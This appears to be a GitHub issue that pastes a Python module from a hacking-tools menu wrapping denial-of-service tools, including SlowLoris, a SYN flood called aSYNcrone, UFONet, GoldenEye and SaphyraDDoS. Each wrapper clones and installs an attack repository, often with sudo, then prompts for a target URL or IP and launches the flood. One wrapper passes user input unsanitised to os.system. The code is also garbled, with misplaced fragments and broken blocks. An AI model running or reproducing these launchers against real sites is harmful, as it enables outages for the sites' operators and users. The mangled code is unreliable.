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(e.g., hello-world-python) #1930

Closed 17Op closed 6 days ago

17Op commented 2 months ago


import os import subprocess

from core import HackingTool from core import HackingToolsCollection

class ddos(HackingTool): TITLE = "ddos" DESCRIPTION = ( "Best DDoS Attack Script With 36 Plus Methods." "DDoS attacks\n\b " "for SECURITY TESTING PURPOSES ONLY! " )

    "git clone https://github.com/the-deepnet/ddos.git",
    "cd ddos;sudo pip3 install -r requirements.txt",
PROJECT_URL = "https://github.com/the-deepnet/ddos.git"

def run(self):
    method = input("Enter Method >> ")
    url = input("Enter URL >> ")
    threads = input("Enter Threads >> ")
    proxylist = input(" Enter ProxyList >> ")
    multiple = input(" Enter Multiple >> ")
    timer = input(" Enter Timer >> ")
    os.system("cd ddos;")
            "python3 ddos",

class SlowLoris(HackingTool): TITLE = "SlowLoris" DESCRIPTION = ( "Slowloris is basically an HTTP Denial of Service attack." "It send lots of HTTP Request" ) INSTALL_COMMANDS = ["sudo pip3 install slowloris"]

def run(self):
    target_site = input("Enter Target Site:- ")
    subprocess.run(["slowloris", target_site])

class Asyncrone(HackingTool): TITLE = "Asyncrone | Multifunction SYN Flood DDoS Weapon" DESCRIPTION = ( "aSYNcrone is a C language based, mulltifunction SYN Flood " "DDoS Weapon.\nDisable the destination system by sending a " "SYN packet intensively to the destination." ) INSTALL_COMMANDS = [ "git clone https://github.com/fatih4842/aSYNcrone.git", "cd aSYNcrone;sudo gcc aSYNcrone.c -o aSYNcrone -lpthread", ] PROJECT_URL = "https://github.com/fatihsnsy/aSYNcrone"

def run(self):
    source_port = input("Enter Source Port >> ")
    target_ip = input("Enter Target IP >> ")
    target_port = input("Enter Target port >> ")
    os.system("cd aSYNcrone;")
        ["sudo", "./aSYNcrone", source_port, target_ip, target_port, 1000]

class UFONet(HackingTool): TITLE = "UFOnet" DESCRIPTION = ( "UFONet - is a free software, P2P and cryptographic " "-disruptive \n toolkit- that allows to perform DoS and " "DDoS attacks\n\b " "More Usage Visit" ) INSTALL_COMMANDS = [ "sudo git clone https://github.com/epsylon/ufonet.git", "cd ufonet;sudo python3 setup.py install;sudo pip3 install GeoIP;sudo pip3 install python-geoip;sudo pip3 install pygeoip;sudo pip3 install requests;sudo pip3 install pycrypto;sudo pip3 install pycurl;sudo pip3 install whois;sudo pip3 install scapy-python3", ] RUN_COMMANDS = ["sudo python3 ufonet --gui"] PROJECT_URL = "https://github.com/epsylon/ufonet"

class GoldenEye(HackingTool): TITLE = "GoldenEye" DESCRIPTION = ( "GoldenEye is a python3 app for SECURITY TESTING PURPOSES ONLY!\n" "GoldenEye is a HTTP DoS Test Tool." ) INSTALL_COMMANDS = [ "sudo git clone https://github.com/jseidl/GoldenEye.git;" "chmod -R 755 GoldenEye" ] PROJECT_URL = "https://github.com/jseidl/GoldenEye"

def run(self):
    os.system("cd GoldenEye ;sudo ./goldeneye.py")
    print("\033[96m Go to Directory \n [*] USAGE: ./goldeneye.py <url> [OPTIONS]")

class Saphyra(HackingTool): TITLE = "SaphyraDDoS" DESCRIPTION = "A complex python code to DDoS any website with a very easy usage.!\n" INSTALL_COMMANDS = [ "sudo su", "git clone https://github.com/anonymous24x7/Saphyra-DDoS.git", "cd Saphyra-DDoS", "chmod +x saphyra.py", "python saphyra.py", ] PROJECT_URL = "https://github.com/anonymous24x7/Saphyra-DDoS"

def run(self):
    url = input("Enter url>>> ")
        os.system("python saphyra.py " + url)
    except Exception:
        print("Enter a valid url.")

class DDOSTools(HackingToolsCollection): TITLE = "DDOS Attack Tools" TOOLS = [SlowLoris(), Asyncrone(), UFONet(), GoldenEye(), Saphyra()]